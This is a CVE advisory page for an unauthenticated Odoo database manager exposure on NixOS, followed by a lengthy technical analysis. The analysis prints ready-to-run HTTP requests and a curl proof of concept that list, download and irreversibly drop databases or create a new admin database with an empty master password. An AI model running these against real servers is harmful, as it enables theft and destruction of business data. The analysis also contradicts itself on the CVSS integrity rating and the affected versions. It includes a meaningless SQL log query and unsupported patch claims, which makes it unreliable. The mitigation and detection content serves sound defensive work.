CVE-2026-25137
CVE-2026-25137
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- None
- User Interaction
- None
- Scope
- Unchanged
- Confidentiality
- High
- Integrity
- None
- Availability
- High
Description
The NixOs Odoo package is an open source ERP and CRM system. From 21.11 to before 25.11 and 26.05, every NixOS based Odoo setup publicly exposes the database manager without any authentication. This allows unauthorized actors to delete and download the entire database, including Odoos file store. Unauthorized access is evident from http requests. If kept, searching access logs and/or Odoos log for requests to /web/database can give indicators, if this has been actively exploited. The database manager is a featured intended for development and not meant to be publicly reachable. On other setups, a master password acts as 2nd line of defence. However, due to the nature of NixOS, Odoo is not able to modify its own configuration file and thus unable to persist the auto-generated password. This also applies when manually setting a master password in the web-UI. This means, the password is lost when restarting Odoo. When no password is set, the user is prompted to set one directly via the database manager. This requires no authentication or action by any authorized user or the system administrator. Thus, the database is effectively world readable by anyone able to reach Odoo. This vulnerability is fixed in 25.11 and 26.05.
Comprehensive Technical Analysis of CVE-2026-25137
NixOS Odoo Database Manager Unauthenticated Exposure Vulnerability
1. Vulnerability Assessment and Severity Evaluation
Overview
CVE-2026-25137 is a critical authentication bypass vulnerability in the NixOS Odoo package, an open-source ERP/CRM system. The flaw arises from the unintended public exposure of Odoo’s database manager interface (/web/database) without any authentication, allowing unauthenticated attackers to delete, download, or manipulate the entire database, including the file store.
Severity Justification (CVSS 9.1 - Critical)
The CVSS v3.1 score of 9.1 (Critical) is justified by the following metrics:
- Attack Vector (AV:N) – Exploitable remotely over the network.
- Attack Complexity (AC:L) – No special conditions required; trivial exploitation.
- Privileges Required (PR:N) – No authentication needed.
- User Interaction (UI:N) – No user interaction required.
- Scope (S:U) – Impact is confined to the vulnerable component (Odoo).
- Confidentiality (C:H) – Full database exposure (sensitive business data, PII, financial records).
- Integrity (I:H) – Complete database deletion or modification possible.
- Availability (A:H) – Database destruction leads to total system unavailability.
Risk Classification
- Exploitability: High (No authentication, no special tools required, publicly accessible endpoint).
- Impact: Critical (Full database compromise, including file storage, leading to data breaches, financial loss, and operational disruption).
- Likelihood of Exploitation: High (Automated scanners can detect and exploit this flaw rapidly).
2. Potential Attack Vectors and Exploitation Methods
Exploitation Pathways
-
Unauthenticated Database Access
- Attackers can directly access
/web/databasevia HTTP/HTTPS. - No credentials or prior authentication required.
- Example Exploit:
GET /web/database HTTP/1.1 Host: <target-odoo-instance> - Result: Full database management interface is exposed.
- Attackers can directly access
-
Database Download (Backup Extraction)
- Attackers can dump the entire database (including sensitive data) via:
POST /web/database/backup HTTP/1.1 Host: <target-odoo-instance> Content-Type: application/x-www-form-urlencoded master_pwd=&name=<db_name>&backup_format=zip - Result: A
.zipfile containing the full database (SQL dump + file store) is downloaded.
- Attackers can dump the entire database (including sensitive data) via:
-
Database Deletion
- Attackers can permanently delete databases via:
POST /web/database/drop HTTP/1.1 Host: <target-odoo-instance> Content-Type: application/x-www-form-urlencoded master_pwd=&name=<db_name> - Result: Immediate and irreversible data loss.
- Attackers can permanently delete databases via:
-
Database Creation (Malicious DB Injection)
- Attackers can create new databases with arbitrary configurations:
POST /web/database/create HTTP/1.1 Host: <target-odoo-instance> Content-Type: application/x-www-form-urlencoded master_pwd=&name=<malicious_db>&login=<admin_user>&password=<admin_pass>&lang=en_US&country_code=US - Result: Persistent backdoor access via a new admin account.
- Attackers can create new databases with arbitrary configurations:
-
File Store Exfiltration
- Odoo’s file store (attachments, documents, binary data) is included in database backups.
- Attackers can extract confidential documents, invoices, contracts, and PII.
Post-Exploitation Impact
- Data Breach: Full exfiltration of customer data, financial records, and intellectual property.
- Ransomware: Database deletion followed by ransom demands.
- Supply Chain Attacks: If Odoo integrates with other systems (e.g., payment gateways, HR systems), attackers may pivot into connected infrastructure.
- Reputation Damage: Loss of customer trust, regulatory fines (GDPR, CCPA), and legal liabilities.
3. Affected Systems and Software Versions
Vulnerable Versions
- NixOS Odoo Package:
- 21.11 to 25.11 (exclusive)
- 26.0 to 26.05 (exclusive)
Root Cause
- NixOS Configuration Limitation:
- Odoo’s master password (a secondary authentication layer) is not persisted in NixOS due to immutable configuration files.
- When Odoo restarts, the master password is lost, reverting the database manager to an unauthenticated state.
- Unlike traditional Odoo deployments (where the master password is stored in
odoo.conf), NixOS prevents runtime configuration changes, leading to this security gap.
Non-Affected Systems
- Standard Odoo Deployments (non-NixOS) where the master password is properly configured.
- NixOS Odoo versions:
- 25.11 and later
- 26.05 and later
4. Recommended Mitigation Strategies
Immediate Actions (For Affected Deployments)
-
Upgrade Odoo Immediately
- Apply patches to 25.11 or 26.05 (or later) to resolve the issue.
- NixOS Users: Update via:
nix-channel --update nixos-rebuild switch --upgrade
-
Network-Level Restrictions
- Firewall Rules: Block external access to
/web/database(allow only from trusted IPs). - Reverse Proxy (Nginx/Apache) Rules:
location /web/database { deny all; return 403; } - Cloudflare/WAF Rules: Block requests to
/web/database*at the edge.
- Firewall Rules: Block external access to
-
Temporary Workarounds (If Upgrade Not Possible)
- Manual Master Password Enforcement:
- Set a strong master password via the Odoo UI (
Settings → Database Manager). - Note: This is not persistent in NixOS and must be reapplied after restarts.
- Set a strong master password via the Odoo UI (
- Automated Script for Password Reapplication:
# Example script to reapply master password on restart odoo --db_master_password="StrongPassword123!" --stop-after-init
- Manual Master Password Enforcement:
-
Monitoring and Detection
- Log Analysis: Search for
/web/databasein:- Odoo logs (
/var/log/odoo/odoo-server.log) - Web server logs (Nginx/Apache)
- SIEM Alerts (e.g., Splunk, ELK, Wazuh)
- Odoo logs (
- Indicators of Compromise (IoCs):
- Unusual
POSTrequests to/web/database/backup,/web/database/drop, or/web/database/create. - Multiple failed login attempts followed by successful database access.
- Unexpected database deletions or new database creations.
- Unusual
- Log Analysis: Search for
Long-Term Mitigations
-
Segmentation & Zero Trust
- Isolate Odoo instances in a dedicated VLAN with strict access controls.
- Implement mutual TLS (mTLS) for internal communications.
-
Database Hardening
- Encrypt sensitive data at rest (PostgreSQL TDE, filesystem encryption).
- Enable PostgreSQL logging to detect unauthorized queries.
-
Automated Patch Management
- Use NixOS auto-updates or Ansible/Puppet for consistent patching.
- Monitor GitHub advisories for Odoo/NixOS security updates.
-
Incident Response Planning
- Backup Strategy: Ensure offline, immutable backups of Odoo databases.
- Forensic Readiness: Maintain logs for at least 90 days for post-breach analysis.
5. Impact on the Cybersecurity Landscape
Broader Implications
-
Supply Chain Risks
- NixOS is increasingly used in DevOps and cloud-native environments.
- Misconfigurations in immutable infrastructure (like NixOS) can lead to widespread exposure if not properly secured.
-
ERP/CRM Security Challenges
- Odoo is widely adopted by SMEs, startups, and enterprises for business operations.
- This vulnerability highlights the criticality of securing ERP/CRM systems, which often contain high-value data.
-
Shift in Attacker Focus
- Ransomware groups may target Odoo instances for data exfiltration + extortion.
- APT groups could exploit this for espionage (e.g., stealing financial records, customer data).
-
Regulatory & Compliance Risks
- GDPR (EU), CCPA (US), LGPD (Brazil): Unauthorized database access constitutes a reportable breach.
- PCI DSS: If Odoo processes payments, this could lead to non-compliance.
-
Open-Source Security Awareness
- Demonstrates the need for better security practices in open-source package management (e.g., NixOS, Docker, Helm).
- Dependency scanning (e.g.,
trivy,grype) should be mandatory in CI/CD pipelines.
6. Technical Details for Security Professionals
Vulnerability Mechanics
-
Odoo Database Manager (
/web/database)- Intended for development use only (not production).
- Provides full CRUD operations (Create, Read, Update, Delete) on databases.
- Master Password Protection:
- Normally, Odoo enforces a master password (stored in
odoo.conf). - NixOS Limitation: Odoo cannot modify its own config file (
/etc/odoo/odoo.conf), so the password is not persisted across restarts.
- Normally, Odoo enforces a master password (stored in
-
NixOS-Specific Issue
- NixOS uses immutable configurations, meaning:
- Odoo’s runtime changes (e.g., master password) are not saved.
- On restart, the system reverts to the original configuration, removing authentication.
- NixOS uses immutable configurations, meaning:
Exploitation Proof of Concept (PoC)
# Step 1: Check if /web/database is exposed
curl -I http://<target-ip>/web/database
# Step 2: List databases (no auth required)
curl -X POST http://<target-ip>/web/database/list -d "master_pwd="
# Step 3: Download a database backup
curl -X POST http://<target-ip>/web/database/backup \
-d "master_pwd=&name=odoo_db&backup_format=zip" \
--output odoo_backup.zip
# Step 4: Delete a database (DESTRUCTIVE)
curl -X POST http://<target-ip>/web/database/drop \
-d "master_pwd=&name=odoo_db"
Detection & Forensics
- Log Analysis Queries:
-- PostgreSQL logs (if enabled) SELECT * FROM pg_stat_activity WHERE query LIKE '%web/database%'; -- Odoo logs grep -i "web/database" /var/log/odoo/odoo-server.log -- Nginx/Apache logs grep -i "/web/database" /var/log/nginx/access.log - SIEM Rules (Splunk Example):
index=web_logs uri_path="/web/database*" | stats count by src_ip, uri_path, http_method | where count > 5
Patch Analysis
- Fix in 25.11 & 26.05:
- NixOS now enforces a default master password at installation.
- Odoo’s database manager is disabled by default in production mode.
- Manual intervention is required to enable it (with proper authentication).
Conclusion & Recommendations
CVE-2026-25137 is a critical vulnerability with severe real-world impact, enabling unauthenticated database compromise in NixOS Odoo deployments. Organizations must:
- Patch immediately to 25.11 or 26.05.
- Restrict network access to
/web/database. - Monitor logs for exploitation attempts.
- Implement long-term hardening (segmentation, encryption, automated patching).
Failure to mitigate this vulnerability could result in catastrophic data breaches, financial loss, and regulatory penalties. Security teams should treat this as a top-priority incident and conduct a full audit of Odoo deployments.
References: